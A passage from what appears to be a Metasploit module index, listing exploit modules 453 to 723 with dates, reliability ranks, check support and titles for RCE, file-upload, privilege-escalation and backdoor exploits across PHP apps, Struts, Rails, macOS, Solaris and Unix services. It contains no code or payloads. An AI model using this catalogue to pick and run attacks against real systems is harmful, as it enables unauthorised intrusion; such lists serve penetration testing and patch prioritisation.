Injection + 453 multi/http/php_utility_belt_rce 2015-12-08 excellent Yes PHP Utility Belt Remote Code Execution + 454 multi/http/php_volunteer_upload_exec 2012-05-28 excellent No PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability + 455 multi/http/phpfilemanager_rce 2015-08-28 excellent Yes phpFileManager 0.9.8 Remote Code Execution + 456 multi/http/phpldapadmin_query_engine 2011-10-24 excellent Yes phpLDAPadmin query_engine Remote PHP Code Injection + 457 multi/http/phpmailer_arg_injection 2016-12-26 manual No PHPMailer Sendmail Argument Injection + 458 multi/http/phpmoadmin_exec 2015-03-03 excellent Yes PHPMoAdmin 1.1.2 Remote Code Execution + 459 multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin 3.5.2.2 server_sync.php Backdoor + 460 multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution + 461 multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution + 462 multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace() + 463 multi/http/phpscheduleit_start_date 2008-10-01 excellent Yes phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection + 464 multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection + 465 multi/http/phpwiki_ploticus_exec 2014-09-11 excellent No Phpwiki Ploticus Remote Code Execution + 466 multi/http/pimcore_unserialize_rce 2019-03-11 normal Yes Pimcore Unserialize RCE + 467 multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution + 468 multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution + 469 multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution + 470 multi/http/pmwiki_pagelist 2011-11-09 excellent Yes PmWiki pagelist.php Remote PHP Code Injection Exploit + 471 multi/http/polarcms_upload_exec 2012-01-21 excellent Yes PolarBear CMS PHP File Upload Vulnerability + 472 multi/http/processmaker_exec 2013-10-24 excellent Yes ProcessMaker Open Source Authenticated PHP Code Execution + 473 multi/http/processmaker_plugin_upload 2010-08-25 excellent No ProcessMaker Plugin Upload + 474 multi/http/qdpm_upload_exec 2012-06-14 excellent Yes qdPM v7 Arbitrary PHP File Upload Vulnerability + 475 multi/http/rails_actionpack_inline_exec 2016-03-01 excellent No Ruby on Rails ActionPack Inline ERB Code Execution + 476 multi/http/rails_double_tap 2019-03-13 excellent Yes Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability + 477 multi/http/rails_dynamic_render_code_exec 2016-10-16 excellent Yes Ruby on Rails Dynamic Render File Upload Remote Code Execution + 478 multi/http/rails_json_yaml_code_exec 2013-01-28 excellent No Ruby on Rails JSON Processor YAML Deserialization Code Execution + 479 multi/http/rails_secret_deserialization 2013-04-11 excellent No Ruby on Rails Known Secret Session Cookie Remote Code Execution + 480 multi/http/rails_web_console_v2_code_exec 2015-06-16 excellent No Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution + 481 multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution + 482 multi/http/rocket_servergraph_file_requestor_rce 2013-10-30 great Yes Rocket Servergraph Admin Center fileRequestor Remote Code Execution + 483 multi/http/sflog_upload_exec 2012-07-06 excellent Yes Sflog! CMS 1.0 Arbitrary File Upload Vulnerability + 484 multi/http/simple_backdoors_exec 2015-09-08 excellent Yes Simple Backdoor Shell Remote Code Execution + 485 multi/http/sit_file_upload 2011-11-10 excellent Yes Support Incident Tracker Remote Command Execution + 486 multi/http/snortreport_exec 2011-09-19 excellent No Snortreport nmap.php/nbtscan.php Remote Command Execution + 487 multi/http/solarwinds_store_manager_auth_filter 2014-08-19 excellent Yes SolarWinds Storage Manager Authentication Bypass + 488 multi/http/sonicwall_gms_upload 2012-01-17 excellent Yes SonicWALL GMS 6 Arbitrary File Upload + 489 multi/http/sonicwall_scrutinizer_methoddetail_sqli 2014-07-24 excellent Yes Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection + 490 multi/http/splunk_mappy_exec 2011-12-12 excellent Yes Splunk Search Remote Code Execution + 491 multi/http/splunk_upload_app_exec 2012-09-27 good Yes Splunk Custom App Remote Code Execution + 492 multi/http/spree_search_exec 2011-10-05 excellent No Spreecommerce 0.60.1 Arbitrary Command Execution + 493 multi/http/spree_searchlogic_exec 2011-04-19 excellent No Spreecommerce Arbitrary Command Execution + 494 multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution + 495 multi/http/struts2_content_type_ognl 2017-03-07 excellent Yes Apache Struts Jakarta Multipart Parser OGNL Injection + 496 multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection + 497 multi/http/struts2_rest_xstream 2017-09-05 excellent Yes Apache Struts 2 REST Plugin XStream RCE + 498 multi/http/struts_code_exec 2010-07-13 good No Apache Struts Remote Command Execution + 499 multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution + 500 multi/http/struts_code_exec_exception_delegator 2012-01-06 excellent No Apache Struts Remote Command Execution + 501 multi/http/struts_code_exec_parameters 2011-10-01 excellent Yes Apache Struts ParametersInterceptor Remote Code Execution + 502 multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution + 503 multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution + 504 multi/http/struts_dmi_exec 2016-04-27 excellent Yes Apache Struts Dynamic Method Invocation Remote Code Execution + 505 multi/http/struts_dmi_rest_exec 2016-06-01 excellent Yes Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution + 506 multi/http/struts_include_params 2013-05-24 great Yes Apache Struts includeParams Remote Code Execution + 507 multi/http/stunshell_eval 2013-03-23 great Yes STUNSHELL Web Shell Remote PHP Code Execution + 508 multi/http/stunshell_exec 2013-03-23 great Yes STUNSHELL Web Shell Remote Code Execution + 509 multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow + 510 multi/http/sysaid_auth_file_upload 2015-06-03 excellent Yes SysAid Help Desk Administrator Portal Arbitrary File Upload + 511 multi/http/sysaid_rdslogs_file_upload 2015-06-03 excellent Yes SysAid Help Desk 'rdslogs' Arbitrary File Upload + 512 multi/http/testlink_upload_exec 2012-08-13 excellent Yes TestLink v1.9.3 Arbitrary File Upload Vulnerability + 513 multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass + 514 multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution + 515 multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution + 516 multi/http/traq_plugin_exec 2011-12-12 excellent Yes Traq admincp/common.php Remote Code Execution + 517 multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi 2017-04-10 excellent Yes Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution + 518 multi/http/uptime_file_upload_1 2013-11-19 excellent Yes Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload + 519 multi/http/uptime_file_upload_2 2013-11-18 excellent Yes Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload + 520 multi/http/v0pcr3w_exec 2013-03-23 great Yes v0pCr3w Web Shell Remote Code Execution + 521 multi/http/vbseo_proc_deutf 2012-01-23 excellent Yes vBSEO proc_deutf() Remote PHP Code Injection + 522 multi/http/vbulletin_unserialize 2015-11-04 excellent Yes vBulletin 5.1.2 Unserialize Code Execution + 523 multi/http/visual_mining_netcharts_upload 2014-11-03 excellent Yes Visual Mining NetCharts Server Remote Code Execution + 524 multi/http/vtiger_install_rce 2014-03-05 manual No Vtiger Install Unauthenticated Remote Command Execution + 525 multi/http/vtiger_logo_upload_exec 2015-09-28 excellent Yes Vtiger CRM - Authenticated Logo Upload RCE + 526 multi/http/vtiger_php_exec 2013-10-30 excellent Yes vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution + 527 multi/http/vtiger_soap_upload 2013-03-26 excellent Yes vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload + 528 multi/http/webnms_file_upload 2016-07-04 excellent Yes WebNMS Framework Server Arbitrary File Upload + 529 multi/http/webpagetest_upload_exec 2012-07-13 excellent Yes WebPageTest Arbitrary PHP File Upload + 530 multi/http/werkzeug_debug_rce 2015-06-28 excellent Yes Werkzeug Debug Shell Command Execution + 531 multi/http/wikka_spam_exec 2011-11-30 excellent Yes WikkaWiki 1.3.2 Spam Logging PHP Injection + 532 multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload + 533 multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload + 534 multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload + 535 multi/http/x7chat2_php_exec 2014-10-27 excellent Yes X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution + 536 multi/http/zabbix_script_exec 2013-10-30 excellent Yes Zabbix Authenticated Remote Command Execution + 537 multi/http/zemra_panel_rce 2012-06-28 excellent Yes Zemra Botnet CnC Web Panel Remote Code Execution + 538 multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload + 539 multi/http/zenworks_control_center_upload 2013-03-22 great Yes Novell ZENworks Configuration Management Remote Execution + 540 multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE + 541 multi/ids/snort_dce_rpc 2007-02-19 good No Snort 2 DCE/RPC Preprocessor Buffer Overflow + 542 multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation + 543 multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc 2016-09-23 excellent Yes MagniComp SysInfo mcsiwrapper Privilege Escalation + 544 multi/local/xorg_x11_suid_server 2018-10-25 good Yes Xorg X11 Server SUID logfile Privilege Escalation + 545 multi/misc/arkeia_agent_exec 2015-07-10 great Yes Western Digital Arkeia Remote Code Execution + 546 multi/misc/batik_svg_java 2012-05-11 excellent No Squiggle 1.7 SVG Browser Java Code Execution + 547 multi/misc/bmc_patrol_cmd_exec 2019-01-17 excellent No BMC Patrol Agent Privilege Escalation Cmd Execution + 548 multi/misc/bmc_server_automation_rscd_nsh_rce 2016-03-16 excellent Yes BMC Server Automation RSCD Agent NSH Remote Command Execution + 549 multi/misc/claymore_dual_miner_remote_manager_rce 2018-02-09 excellent Yes Nanopool Claymore Dual Miner APIs RCE + 550 multi/misc/consul_rexec_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Rexec + 551 multi/misc/consul_service_exec 2018-08-11 excellent Yes Hashicorp Consul Remote Command Execution via Services API + 552 multi/misc/erlang_cookie_rce 2009-11-20 great No Erlang Port Mapper Daemon Cookie RCE + 553 multi/misc/hp_data_protector_exec_integutil 2014-10-02 great Yes HP Data Protector EXEC_INTEGUTIL Remote Code Execution + 554 multi/misc/hp_vsa_exec 2011-11-11 excellent No HP StorageWorks P4000 Virtual SAN Appliance Command Execution + 555 multi/misc/indesign_server_soap 2012-11-11 excellent Yes Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution + 556 multi/misc/java_jdwp_debugger 2010-03-12 good Yes Java Debug Wire Protocol Remote Code Execution + 557 multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution + 558 multi/misc/java_rmi_server 2011-10-15 excellent No Java RMI Server Insecure Default Configuration Java Code Execution + 559 multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution + 560 multi/misc/msf_rpc_console 2011-05-22 excellent No Metasploit RPC Console Command Execution + 561 multi/misc/msfd_rce_remote 2018-04-11 excellent Yes Metasploit msfd Remote Code Execution + 562 multi/misc/nodejs_v8_debugger 2016-08-15 excellent Yes NodeJS Debugger Command Injection + 563 multi/misc/openoffice_document_macro 2017-02-08 excellent No Apache OpenOffice Text Document Malicious Macro Execution + 564 multi/misc/openview_omniback_exec 2001-02-28 excellent Yes HP OpenView OmniBack II Command Execution + 565 multi/misc/osgi_console_exec 2018-02-13 normal Yes Eclipse Equinoxe OSGi Console Command Execution + 566 multi/misc/pbot_exec 2009-11-02 excellent Yes PHP IRC Bot pbot eval() Remote Code Execution + 567 multi/misc/persistent_hpca_radexec_exec 2014-01-02 great Yes HP Client Automation Command Injection + 568 multi/misc/ra1nx_pubcall_exec 2013-03-24 great Yes Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution + 569 multi/misc/teamcity_agent_xmlrpc_exec 2015-04-14 excellent Yes TeamCity Agent XML-RPC Command Execution + 570 multi/misc/veritas_netbackup_cmdexec 2004-10-21 excellent Yes VERITAS NetBackup Remote Command Execution + 571 multi/misc/w3tw0rk_exec 2015-06-04 excellent Yes w3tw0rk / Pitbul IRC Bot Remote Code Execution + 572 multi/misc/weblogic_deserialize 2018-04-17 manual Yes Oracle Weblogic Server Deserialization RCE + 573 multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService + 574 multi/misc/weblogic_deserialize_marshalledobject 2016-07-19 manual No Oracle Weblogic Server Deserialization RCE - MarshalledObject + 575 multi/misc/weblogic_deserialize_rawobject 2015-01-28 excellent No Oracle Weblogic Server Deserialization RCE - Raw Object + 576 multi/misc/weblogic_deserialize_unicastref 2017-01-25 excellent No Oracle Weblogic Server Deserialization RCE - RMI UnicastRef + 577 multi/misc/wireshark_lwres_getaddrbyname 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow + 578 multi/misc/wireshark_lwres_getaddrbyname_loop 2010-01-27 great No Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop) + 579 multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution + 580 multi/misc/zend_java_bridge 2011-03-28 great No Zend Server Java Bridge Arbitrary Java Code Execution + 581 multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution + 582 multi/ntp/ntp_overflow 2001-04-04 good No NTP Daemon readvar Buffer Overflow + 583 multi/php/php_unserialize_zval_cookie 2007-03-04 average Yes PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) + 584 multi/php/wp_duplicator_code_inject 2018-08-29 manual Yes Snap Creek Duplicator WordPress plugin code injection + 585 multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution + 586 multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution + 587 multi/realserver/describe 2002-12-20 great Yes RealServer Describe Buffer Overflow + 588 multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow + 589 multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution + 590 multi/sap/sap_mgmt_con_osexec_payload 2011-03-08 excellent Yes SAP Management Console OSExecute Payload Execution + 591 multi/sap/sap_soap_rfc_sxpg_call_system_exec 2013-03-26 great Yes SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution + 592 multi/sap/sap_soap_rfc_sxpg_command_exec 2012-05-08 great Yes SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution + 593 multi/script/web_delivery 2013-07-19 manual No Script Web Delivery + 594 multi/ssh/sshexec 1999-01-01 manual No SSH User Code Execution + 595 multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve + 596 multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution + 597 multi/vnc/vnc_keyboard_exec 2015-07-10 great No VNC Keyboard Remote Code Execution + 598 multi/vpn/tincd_bof 2013-04-22 average No Tincd Post-Authentication Remote TCP Stack Buffer Overflow + 599 multi/wyse/hagent_untrusted_hsdata 2009-07-10 excellent No Wyse Rapport Hagent Fake Hserver Command Execution + 600 netware/smb/lsass_cifs 2007-01-21 average No Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow + 601 netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow + 602 osx/afp/loginext 2004-05-03 average No AppleFileServer LoginExt PathName Overflow + 603 osx/arkeia/type77 2005-02-18 average Yes Arkeia Backup Client Type 77 Overflow (Mac OS X) + 604 osx/browser/adobe_flash_delete_range_tl_op 2016-04-27 great No Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion + 605 osx/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free + 606 osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution + 607 osx/browser/safari_metadata_archive 2006-02-21 excellent No Safari Archive Metadata Command Execution + 608 osx/browser/safari_proxy_object_type_confusion 2018-03-15 manual No Safari Proxy Object Type Confusion + 609 osx/browser/safari_user_assisted_applescript_exec 2015-10-16 manual No Safari User-Assisted Applescript Exec Attack + 610 osx/browser/safari_user_assisted_download_launch 2014-03-10 manual No Safari User-Assisted Download and Run Attack + 611 osx/browser/software_update 2007-12-17 excellent No Apple OS X Software Update Command Execution + 612 osx/email/mailapp_image_exec 2006-03-01 manual No Mail.app Image Attachment Command Execution + 613 osx/ftp/webstar_ftp_user 2004-07-13 average No WebSTAR FTP Server USER Overflow + 614 osx/http/evocam_webserver 2010-06-01 average No MacOS X EvoCam HTTP GET Buffer Overflow + 615 osx/local/dyld_print_to_file_root 2015-07-21 great Yes Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation + 616 osx/local/iokit_keyboard_root 2014-09-24 manual Yes Mac OS X IOKit Keyboard Driver Root Privilege Escalation + 617 osx/local/libxpc_mitm_ssudo 2018-03-15 excellent Yes Mac OS X libxpc MITM Privilege Escalation + 618 osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit + 619 osx/local/persistence 2012-04-01 excellent No Mac OS X Persistent Payload Installer + 620 osx/local/root_no_password 2017-11-29 excellent No Mac OS X Root Privilege Escalation + 621 osx/local/rootpipe 2015-04-09 great Yes Apple OS X Rootpipe Privilege Escalation + 622 osx/local/rootpipe_entitlements 2015-07-01 great Yes Apple OS X Entitlements Rootpipe Privilege Escalation + 623 osx/local/rsh_libmalloc 2015-10-01 normal No Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation + 624 osx/local/setuid_tunnelblick 2012-08-11 excellent Yes Setuid Tunnelblick Privilege Escalation + 625 osx/local/setuid_viscosity 2012-08-12 excellent Yes Viscosity setuid-set ViscosityHelper Privilege Escalation + 626 osx/local/sudo_password_bypass 2013-02-28 normal Yes Mac OS X Sudo Password Bypass + 627 osx/local/tpwn 2015-08-16 normal Yes Mac OS X "tpwn" Privilege Escalation + 628 osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) + 629 osx/mdns/upnp_location 2007-05-25 average Yes Mac OS X mDNSResponder UPnP Location Overflow + 630 osx/misc/ufo_ai 2009-10-28 average No UFO: Alien Invasion IRC Client Buffer Overflow + 631 osx/rtsp/quicktime_rtsp_content_type 2007-11-23 average No MacOS X QuickTime RTSP Content-Type Overflow + 632 osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow + 633 osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) + 634 qnx/local/ifwatchd_priv_esc 2014-03-10 excellent Yes ifwatchd Privilege Escalation + 635 qnx/qconn/qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution + 636 solaris/dtspcd/heap_noir 2002-07-10 great Yes Solaris dtspcd Heap Overflow + 637 solaris/local/extremeparr_dtappgather_priv_esc 2017-04-24 excellent Yes Solaris 'EXTREMEPARR' dtappgather Privilege Escalation + 638 solaris/local/libnspr_nspr_log_file_priv_esc 2006-10-11 excellent Yes Solaris libnspr NSPR_LOG_FILE Privilege Escalation + 639 solaris/local/rsh_stack_clash_priv_esc 2017-06-19 good Yes Solaris RSH Stack Clash Privilege Escalation + 640 solaris/lpd/sendmail_exec 2001-08-31 excellent No Solaris LPD Command Execution + 641 solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow + 642 solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) + 643 solaris/sunrpc/sadmind_adm_build_path 2008-10-14 great No Sun Solaris sadmind adm_build_path() Buffer Overflow + 644 solaris/sunrpc/sadmind_exec 2003-09-13 excellent No Solaris sadmind Command Execution + 645 solaris/sunrpc/ypupdated_exec 1994-12-12 excellent No Solaris ypupdated Command Execution + 646 solaris/telnet/fuser 2007-02-12 excellent No Sun Solaris Telnet Remote Authentication Bypass Vulnerability + 647 solaris/telnet/ttyprompt 2002-01-18 excellent No Solaris in.telnetd TTYPROMPT Buffer Overflow + 648 unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock) + 649 unix/dhcp/rhel_dhcp_client_command_injection 2018-05-15 excellent No DHCP Client Command Injection (DynoRoot) + 650 unix/fileformat/ghostscript_type_confusion 2017-04-27 excellent No Ghostscript Type Confusion Arbitrary Command Execution + 651 unix/fileformat/imagemagick_delegate 2016-05-03 excellent No ImageMagick Delegate Arbitrary Command Execution + 652 unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution + 653 unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution + 654 unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution + 655 unix/http/contentkeeperweb_mimencode 2009-02-25 excellent Yes ContentKeeper Web Remote Command Execution + 656 unix/http/ctek_skyrouter 2011-09-08 average No CTEK SkyRouter 4200 and 4300 Command Execution + 657 unix/http/dell_kace_k1000_upload 2014-03-07 excellent Yes Dell KACE K1000 File Upload + 658 unix/http/epmp1000_get_chart_cmd_shell 2017-12-18 excellent Yes Cambium ePMP1000 'get_chart' Shell via Command Injection (v3.1-3.5-RC7) + 659 unix/http/epmp1000_ping_cmd_shell 2015-11-28 excellent Yes Cambium ePMP1000 'ping' Shell via Command Injection (up to v2.5) + 660 unix/http/freepbx_callmenum 2012-03-20 manual No FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution + 661 unix/http/lifesize_room 2011-07-13 excellent No LifeSize Room Command Injection + 662 unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense + 663 unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE + 664 unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE + 665 unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection + 666 unix/http/tnftp_savefile 2014-10-28 excellent No tnftp "savefile" Arbitrary Command Execution + 667 unix/http/twiki_debug_plugins 2014-10-09 excellent Yes TWiki Debugenableplugins Remote Code Execution + 668 unix/http/vmturbo_vmtadmin_exec_noauth 2014-06-25 excellent Yes VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution + 669 unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution + 670 unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution + 671 unix/local/at_persistence 1997-01-01 excellent Yes at(1) Persistence + 672 unix/local/chkrootkit 2014-06-04 manual Yes Chkrootkit Local Privilege Escalation + 673 unix/local/emacs_movemail 1986-08-01 excellent Yes Emacs movemail Privilege Escalation + 674 unix/local/exim_perl_startup 2016-03-10 excellent Yes Exim "perl_startup" Privilege Escalation + 675 unix/local/netbsd_mail_local 2016-07-07 excellent No NetBSD mail.local Privilege Escalation + 676 unix/local/setuid_nmap 2012-07-19 excellent Yes Setuid Nmap Exploit + 677 unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution + 678 unix/misc/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass + 679 unix/misc/polycom_hdx_traceroute_exec 2017-11-12 excellent Yes Polycom Shell HDX Series Traceroute Command Execution + 680 unix/misc/qnx_qconn_exec 2012-09-04 excellent Yes QNX qconn Command Execution + 681 unix/misc/spamassassin_exec 2006-06-06 excellent No SpamAssassin spamd Remote Command Execution + 682 unix/misc/xerox_mfp 2012-03-07 good No Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability + 683 unix/misc/zabbix_agent_exec 2009-09-10 excellent No Zabbix Agent net.tcp.listen Command Injection + 684 unix/polycom_hdx_auth_bypass 2013-01-18 normal Yes Polycom Command Shell Authorization Bypass + 685 unix/smtp/clamav_milter_blackhole 2007-08-24 excellent No ClamAV Milter Blackhole-Mode Remote Code Execution + 686 unix/smtp/exim4_string_format 2010-12-07 excellent No Exim4 string_format Function Heap Buffer Overflow + 687 unix/smtp/morris_sendmail_debug 1988-11-02 average Yes Morris Worm sendmail Debug Mode Shell Escape + 688 unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock) + 689 unix/sonicwall/sonicwall_xmlrpc_rce 2016-07-22 excellent Yes SonicWall Global Management System XMLRPC set_time_zone Unauth RCE + 690 unix/ssh/array_vxag_vapv_privkey_privesc 2014-02-03 excellent No Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution + 691 unix/ssh/tectia_passwd_changereq 2012-12-01 excellent Yes Tectia SSH USERAUTH Change Request Password Reset Vulnerability + 692 unix/webapp/actualanalyzer_ant_cookie_exec 2014-08-28 excellent Yes ActualAnalyzer 'ant' Cookie Command Execution + 693 unix/webapp/arkeia_upload_exec 2013-09-16 excellent Yes Western Digital Arkeia Remote Code Execution + 694 unix/webapp/awstats_configdir_exec 2005-01-15 excellent Yes AWStats configdir Remote Command Execution + 695 unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution + 696 unix/webapp/awstatstotals_multisort 2008-08-26 excellent Yes AWStats Totals multisort Remote Command Execution + 697 unix/webapp/barracuda_img_exec 2005-09-01 excellent Yes Barracuda IMG.PL Remote Command Execution + 698 unix/webapp/base_qry_common 2008-06-14 excellent No BASE base_qry_common Remote File Include + 699 unix/webapp/basilic_diff_exec 2012-06-28 excellent Yes Basilic 1.5.14 diff.php Arbitrary Command Execution + 700 unix/webapp/cacti_graphimage_exec 2005-01-15 excellent No Cacti graph_view.php Remote Command Execution + 701 unix/webapp/cakephp_cache_corruption 2010-11-15 excellent No CakePHP Cache Corruption Code Execution + 702 unix/webapp/carberp_backdoor_exec 2013-06-28 great Yes Carberp Web Panel C2 Backdoor Remote PHP Code Execution + 703 unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution + 704 unix/webapp/clipbucket_upload_exec 2013-10-04 excellent Yes ClipBucket Remote Code Execution + 705 unix/webapp/coppermine_piceditor 2008-01-30 excellent Yes Coppermine Photo Gallery picEditor.php Command Execution + 706 unix/webapp/datalife_preview_exec 2013-01-28 excellent Yes DataLife Engine preview.php PHP Code Injection + 707 unix/webapp/dogfood_spell_exec 2009-03-03 excellent Yes Dogfood CRM spell.php Remote Command Execution + 708 unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution + 709 unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection + 710 unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution + 711 unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE + 712 unix/webapp/egallery_upload_exec 2012-07-08 excellent Yes EGallery PHP File Upload Vulnerability + 713 unix/webapp/elfinder_php_connector_exiftran_cmd_injection 2019-02-26 excellent Yes elFinder PHP Connector exiftran Command Injection + 714 unix/webapp/flashchat_upload_exec 2013-10-04 excellent Yes FlashChat Arbitrary File Upload + 715 unix/webapp/foswiki_maketext 2012-12-03 excellent Yes Foswiki MAKETEXT Remote Command Execution + 716 unix/webapp/freepbx_config_exec 2014-03-21 excellent Yes FreePBX config.php Remote Code Execution + 717 unix/webapp/generic_exec 1993-11-14 excellent No Generic Web Application Unix Command Execution + 718 unix/webapp/get_simple_cms_upload_exec 2014-01-04 excellent Yes GetSimpleCMS PHP File Upload Vulnerability + 719 unix/webapp/google_proxystylesheet_exec 2005-08-16 excellent Yes Google Appliance ProxyStyleSheet Command Execution + 720 unix/webapp/graphite_pickle_exec 2013-08-20 excellent Yes Graphite Web Unsafe Pickle Handling + 721 unix/webapp/guestbook_ssi_exec 1999-11-05 excellent No Matt Wright guestbook.pl Arbitrary Command Execution + 722 unix/webapp/hastymail_exec 2011-11-22 excellent Yes Hastymail 2.1.1 RC1 Command Injection + 723 